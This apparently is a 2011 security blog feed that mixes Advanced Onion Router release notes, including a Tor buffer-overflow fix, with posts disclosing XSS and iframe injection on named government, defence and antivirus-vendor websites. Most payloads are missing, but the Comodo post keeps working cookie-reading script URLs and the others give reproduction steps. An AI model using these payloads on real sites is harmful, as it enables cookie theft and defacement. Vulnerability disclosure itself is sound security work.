nemesis.te-home.net

Advanced Onion Router 0.3.0.2b

Sat, 26 Nov 2011 10:31:56 GMT

New release of Advanced Onion Router - version 0.3.0.2b

Changes:

corrected: when entering hibernation, directory connections were not closed
only routers that are not considered bad exits are added to the system tray menus unless they are added to favorites
routers that are marked as invalid/not running/fake will have their bandwidth rate prefixed by a question mark in the exit selection dialog

Download:

The Ministry of Communication and Information Technologies of the Republic of Azerbaijan - XSS & Iframe Injection

Sat, 26 Nov 2011 12:24:27 GMT

The Ministry of Communication and Information Technologies of the Republic of Azerbaijan

Search strings:

Code:

XSS_by_Team_Elite

and

Code:

PoC:

XSS -

Iframe Injection -

The administration have been notified about the flaw.

']['€AM€LiT€

Federal Ministry Of Information And Communications Of Nigeria - XSS & Iframe Injection

Sun, 27 Nov 2011 13:22:08 GMT

Federal Ministry Of Information And Communications Of Nigeria

Vulnerable page: http://www.fmic.gov.ng/search.asp

Search strings:

Code:

and

Code:

PoC:

XSS -

Iframe Injection -

The administration have been notified about the flaw.

']['€AM€LiT€

Ministry of Information and Communications of Nepal - XSS & Iframe Injection

Sun, 27 Nov 2011 13:29:02 GMT

Ministry of Information and Communications Of Nepal

Vulnerable page: http://www.moic.gov.np/contacts.php

I filled in all the forms with following strings:

Code:

and

Code:

PoC:

XSS -

Iframe Injection -

The administration have been notified about the problem.

']['€AM€LiT€

ArcaBit - XSS & Iframe Injection

Sun, 27 Nov 2011 14:24:30 GMT

I found an XSS and Iframe on ArcaBit's website 2 years ago. Since then, their website has changed a lot, but some old mistakes remained. It seems some people don't learn from their mistakes.

Vulnerable page: https://www.arcabit.pl/sklep?app=shop_checkout

In order to reproduce the bug, you need to fill in all the required fields with something valid. And those which are not required with something like:

Code:

and

Code:

PoC:

XSS -

Iframe Injection -

NOTE: This is a proof of concept and it doesn't reflect the views or interests of above website.

']['€AM€LiT€

Advanced Onion Router 0.3.0.3a

Sat, 3 Dec 2011 17:15:08 GMT

New release of Advanced Onion Router - version 0.3.0.3a

Changes:

corrected: hidden services are no longer added twice for versions 0 and 2 (support for version 0 was removed from tor-0.2.2.34); HiddenServiceVersion was removed
new options on the "Connections" page: "Bandwidth rate per connection" (PerConnBWRate) and "Bandwidth burst per connection" (PerConnBWBurst)
new options on the "Circuit build" page: "Learn circuit build timeout" (LearnCircuitBuildTimeout), "Stream timeout until trying a new circuit (seconds)" (CircuitStreamTimeout) and "Cell scale factor" (CircuitPriorityHalflife)
new option on the "Become a server" page: "Refuse exit streams from unknown relays" (RefuseUnknownExits)
new option on the "Private identity" page: "Reinitialize the global SSL context" (IdentityFlags&IDENTITY_FLAG_REINIT_KEYS, default value: IDENTITY_FLAG_REINIT_KEYS)
the options AllowDotExit, HTTPFlags&HTTP_SETTING_REJECT_EXITNAME and HTTPFlags&HTTP_SETTING_REJECT_ONION were merged as AllowTorHosts (default value: ALLOW_DOT_ONION)
the options "Reject requests for *.exitname.exit URL's" and "Reject requests for *.onion URL's" were moved from the "HTTP headers" page to the "Banned addresses" page
updated language strings: 3020, 3181, 3182, 3183, 3184, 3185, 3186, 3187, 3188, 3189
corrected: when the options to reject hosts ending with ".exitname.exit" or ".onion" were enabled, the suffix was searched from a wrong position

Download:

Advanced Onion Router 0.3.0.4

Sat, 10 Dec 2011 22:03:51 GMT

New release of Advanced Onion Router - version 0.3.0.4.

Changes:

the option "Allow invalid certification authorities from certificates for bridges.torproject.org" was removed; on error, a message box will ask if the download should be retried ignoring unrecognized CA's
the options TunnelDirConns (BOOL) and PreferTunneledDirConns (BOOL) were merged as TunnelDirConns (UINT)
all procedures that handle proxy requests for OR and directory connections were moved to connection_proxy.c
the options HttpsProxy, HttpsProxyAuthenticator, Socks4Proxy, Socks5Proxy, Socks5ProxyUsername and Socks5ProxyPassword were merged as ORProxy, ORProxyAuthenticator and ORProxyProtocol (supported protocols: HTTPS, Socks4 and Socks5)
added support for HTTPS, Socks4 and Socks5 proxies for HTTP directory connections
the options HttpProxy and HttpProxyAuthenticator were replaced with DirProxy, DirProxyAuthenticator and DirProxyProtocol (supported protocols: HTTP, HTTPS, Socks4 and Socks5)
updated language strings: 656, 2540, 2541, 2542, 2875, 2991, 2992, 2993, 2994, 2995, 2996, 2998, 3031, 3190
the instructions for making a "Tor browser" with Firefox and the AdvOR.ini sample for Firefox were updated to work with the latest "Tor Browser" package from torproject.org (tor-browser-2.2.34-3_en-US.exe)
geoip_c.h was updated with GeoIPCountryWhois.csv released on December 7th

Download:

AdvOR-0.3.0.4.zip - SourceForge / Nemesis
AdvOR-0.3.0.4src.zip - SourceForge / Nemesis

Advanced Onion Router 0.3.0.4b

Tue, 13 Dec 2011 18:04:34 GMT

New release of Advanced Onion Router - version 0.3.0.4b.

Changes:

corrected: buffer overflow when repacking the first chunk of a buf_t buffer (bugfix for AdvOR and Tor, all versions)

Download:

AdvOR-0.3.0.4b.zip - SourceForge / Nemesis
AdvOR-0.3.0.4bsrc.zip - SourceForge / Nemesis

Advanced Onion Router 0.3.0.5

Thu, 15 Dec 2011 18:41:32 GMT

New release of Advanced Onion Router - version 0.3.0.5.

Changes:

corrected: when the option to reject .exitname.exit hostnames was enabled, addresses that were mapped to exit nodes were also rejected (thanks to DavidWakelin for reporting this problem)
when the circuit path length is set to 1, the option "Do not use the public key step for the entry node" will be disabled
new configuration options: CorporateProxy, CorporateProxyDomain, CorporateProxyAuthenticator and CorporateProxyProtocol (supported protocols: NTLM)
added support for NTLM proxies (libntlm 1.3)
new options on the "Bypass ISP filtering" page: "Always use this NTLM proxy" (CorporateProxy, CorporateProxyProtocol), "workstation@domain" (CorporateProxyDomain), "Account (username:password)" (CorporateProxyAuthenticator)
the NTLM proxy can be chained with ORProxy and/or DirProxy if needed; when enabled, the NTLM proxy is always the first proxy of a proxy chain
updated language strings: 3191, 3192, 3193, 3194, 3195, 3196, 3197, 3198, 3199, 3200

Download:

AdvOR-0.3.0.5.zip - SourceForge / Nemesis
AdvOR-0.3.0.5src.zip - SourceForge / Nemesis

Note: A buffer overflow error was corrected in version 0.3.0.4b of AdvOR. This error is present in all versions of AdvOR lower than 0.3.0.4b and in all versions of Tor. Remote exploitation is possible, so everyone is advised to update.

On december 13th I notified the torproject.org team about this error and I told them that in buffers.c they should replace this:

Code:

                /* We don't need to grow the first chunk, but we might need to repack it.*/
                if(CHUNK_REMAINING_CAPACITY(buf->head) < capacity-buf->datalen)
                        chunk_repack(buf->head);
                tor_assert(CHUNK_REMAINING_CAPACITY(buf->head) >= capacity-buf->datalen);

with this:

Code:

                /* We don't need to grow the first chunk, but we might need to repack it.*/
                if(CHUNK_REMAINING_CAPACITY(buf->head) < capacity-buf->head->datalen)
                        chunk_repack(buf->head);
                tor_assert(CHUNK_REMAINING_CAPACITY(buf->head) >= capacity-buf->head->datalen);

So far, this error is corrected only in AdvOR 0.3.0.4b and 0.3.0.5 .

Tor users will have to wait for a bug fix from torproject.org .

Lockheed Martin - XSS & Iframe Injection

Fri, 16 Dec 2011 15:46:02 GMT

Vulnerable page: http://www.lockheedmartin.com/contact_us/ContactUs.html

In order to reproduce the bug, you need to fill in all contact fields with something like:

Code:

XSS found by Team Elite

Code:

PoC:

XSS -

Iframe Injection -

NOTE: This is a proof of concept and it doesn't reflect the views or interests of above website.

']['€AM€LiT€

Advanced Onion Router 0.3.0.6

Fri, 16 Dec 2011 23:37:22 GMT

New release of Advanced Onion Router - version 0.3.0.6.

Changes:

[tor-0.2.2.35] (this change was not applied because AdvOR already had a better fix since 0.3.0.4b) Fix a heap overflow bug that could occur when trying to pull data into the first chunk of a buffer, when that chunk had already had some data drained from it. Fixes CVE-2011-2778; bugfix on 0.2.0.16-alpha. Reported by "Vektor".
[tor-0.2.2.35] Initialize Libevent with the EVENT_BASE_FLAG_NOLOCK flag enabled, so that it doesn't attempt to allocate a socketpair. This could cause some problems on Windows systems with overzealous firewalls. Fix for bug 4457; workaround for Libevent versions 2.0.1-alpha through 2.0.15-stable.
[tor-0.2.2.35] If we mark an OR connection for close based on a cell we process, don't process any further cells on it. We already avoid further reads on marked-for-close connections, but now we also discard the cells we'd already read. Fixes bug 4299; bugfix on 0.2.0.10-alpha, which was the first version where we might mark a connection for close based on processing a cell on it.
[tor-0.2.2.35] Correctly sanity-check that we don't underflow on a memory allocation (and then assert) for hidden service introduction point decryption. Bug discovered by Dan Rosenberg. Fixes bug 4410; bugfix on 0.2.1.5-alpha.
[tor-0.2.2.35] Fix a memory leak when we check whether a hidden service descriptor has any usable introduction points left. Fixes bug 4424. Bugfix on 0.2.2.25-alpha.
[tor-0.2.2.35] Detect failure to initialize Libevent. This fix provides better detection for future instances of bug 4457.
[tor-0.2.2.35] Avoid frequent calls to the fairly expensive cull_wedged_cpuworkers function. This was eating up hideously large amounts of time on some busy servers. Fixes bug 4518; bugfix on 0.0.9.8.
[tor-0.2.2.35] Resolve an integer overflow bug in smartlist_ensure_capacity(). Fixes bug 4230; bugfix on Tor 0.1.0.1-rc. Based on a patch by Mansour Moufid.
[tor-0.2.2.35] When configuring, starting, or stopping an NT service, stop immediately after the service configuration attempt has succeeded or failed. Fixes bug 3963; bugfix on 0.2.0.7-alpha.
[tor-0.2.2.35] When sending a NETINFO cell, include the original address received for the other side, not its canonical address. Found by "troll_un"; fixes bug 4349; bugfix on 0.2.0.10-alpha.
[tor-0.2.2.35] Fix a memory leak in launch_direct_bridge_descriptor_fetch() that occurred when a client tried to fetch a descriptor for a bridge in ExcludeNodes. Fixes bug 4383; bugfix on 0.2.2.25-alpha.
[tor-0.2.2.35] If we had ever tried to call tor_addr_to_str on an address of unknown type, we would have done a strdup on an uninitialized buffer. Now we won't. Fixes bug 4529; bugfix on 0.2.1.3-alpha. Reported by "troll_un".
[tor-0.2.2.35] Correctly detect and handle transient lookup failures from tor_addr_lookup. Fixes bug 4530; bugfix on 0.2.1.5-alpha. Reported by "troll_un".
[tor-0.2.2.35] Fix null-pointer access that could occur if TLS allocation failed. Fixes bug 4531; bugfix on 0.2.0.20-rc. Found by "troll_un".
[tor-0.2.2.35] Use tor_socket_t type for listener argument to accept(). Fixes bug 4535; bugfix on 0.2.2.28-beta. Found by "troll_un".
[tor-0.2.2.35] Add two new config options for directory authorities: AuthDirFastGuarantee sets a bandwidth threshold for guaranteeing the Fast flag, and AuthDirGuardBWGuarantee sets a bandwidth threshold that is always sufficient to satisfy the bandwidth requirement for the Guard flag. Now it will be easier for researchers to simulate Tor networks with different values. Resolves ticket 4484.
corrected: the OR port was set while initializing keys (thanks to DavidWakelin for reporting this error)
updated language strings: 3201, 3202

Download:

AdvOR-0.3.0.6.zip - SourceForge / Nemesis
AdvOR-0.3.0.6src.zip - SourceForge / Nemesis

Norman.com XSS Vulnerability

Sat, 17 Dec 2011 02:32:17 GMT

Vulnerable page: http://www.norman.com/

PoC:

Code:

@ onekey
">
">

To reproduce the bug you need a HTML form that uses POST method and onekey as XSS code input field. Click on example button:

Related stuff: Another Kaspersky.com XSS Vulnerability

Note: This is a proof of concept and it doesn't reflect the views or interests of above website.

']['€AM€LiT€

Comodo.com XSS Vulnerability

Sat, 17 Dec 2011 15:39:48 GMT

Vulnerable page:

=%22%3E%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E]https://accounts.comodo.com/
=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E]https://accounts.comodo.com/

PoC:

Code:

https://accounts.comodo.com/account/forget_password?user[login]=">

https://accounts.comodo.com/account/forget_password?user[login]=">

You can either include any HTML code from login input box, or request any HTML code directly using GET method and user[login] parameter. In either case don't forget to close the login box input tag.

Related stuff: Norman.com XSS Vulnerability

Note: This is a proof of concept and it doesn't reflect the views or interests of above website.

']['€AM€LiT€

Avast (Polish website) - XSS & Iframe Injection

Sun, 18 Dec 2011 09:59:39 GMT

Vulnerable page: http://www.lers.pl/koszyk/krok2

In order to reproduce the bug you need to include any HTML code in all required fields. The code I used:

Code:

and

Code:

Screenshots:

XSS -

Iframe Injection -

Note: This is a proof of concept and it doesn't reflect the views or interests of above website.

']['€AM€LiT€

Kaspersky (Polish website) - XSS & Iframe Injection

Sun, 18 Dec 2011 10:11:50 GMT

Vulnerable page: https://www.softbuy.pl/kaspersky/store

In order to reproduce the bug you need to include any HTML code in all required fields. The code I used:

Code:

and

Code:

Screenshots:

XSS -

Iframe Injection -

Note: This is a proof of concept and it doesn't reflect the views or interests of above website.

']['€AM€LiT€

Another Norman.com XSS Vulnerability

Mon, 19 Dec 2011 21:26:12 GMT

Vulnerable page: http://www.norman.com/support/

PoC:

Code:

To reproduce the bug you need a HTML form that uses POST method, set lime_uniqueIdentifier input tag value to 1 and use email as XSS code input field. Click on example button:

Related stuff: Norman.com XSS Vulnerability

Notes:

This is a proof of concept and it doesn't reflect the views or interests of above website.
The owner of above website has been notified.

']['€AM€LiT€

Avira.com - XSS

Tue, 20 Dec 2011 11:22:04 GMT

Vulnerable page: http://www.avira.com/en/support-phonesupport-for-business

In order to reproduce the bug, you need to include any HTML code in all required fields. The code I've used:

Code:

XSS by TE

Screenshot:

Note: This is a proof of concept and it doesn't reflect the views or interests of above website. The administration of above website have been informed about the flaw.

']['€AM€LiT€

Advanced Onion Router 0.3.0.7

Tue, 20 Dec 2011 19:53:13 GMT

New release of Advanced Onion Router - version 0.3.0.7.

Changes:

corrected a change from version 0.3.0.6 in tor_addr_port_parse() that caused it to return errors when parsing proxy IP addresses (thanks to anonymous11 for reporting this error)
improved the search algorithm for addresses that are added to the context menus related to strings selected in the "Debug" window
all router selection dialogs will show bandwidth capacities instead of bandwidth rates for routers that are not banned
the lists with favorite routers and with banned routers are no longer limited to 65536 characters
added instructions for using TorChat with AdvOR and configuration samples to AdvOR\Help\TorChat (readme.txt, AdvOR.ini and torrc.txt)

Download:

AdvOR-0.3.0.7.zip - SourceForge / Nemesis
AdvOR-0.3.0.7src.zip - SourceForge / Nemesis

testing

Thu, 22 Dec 2011 15:55:24 GMT

testing

']['€AM€LiT€

Merry Christmas!

Sat, 24 Dec 2011 19:10:31 GMT

May the good times and treasures of the present become the golden memories of tomorrow. Wish you lots of love, joy and happiness. MERRY CHRISTMAS to everyone.

']['€AM€LiT€

']['€AM€LiT€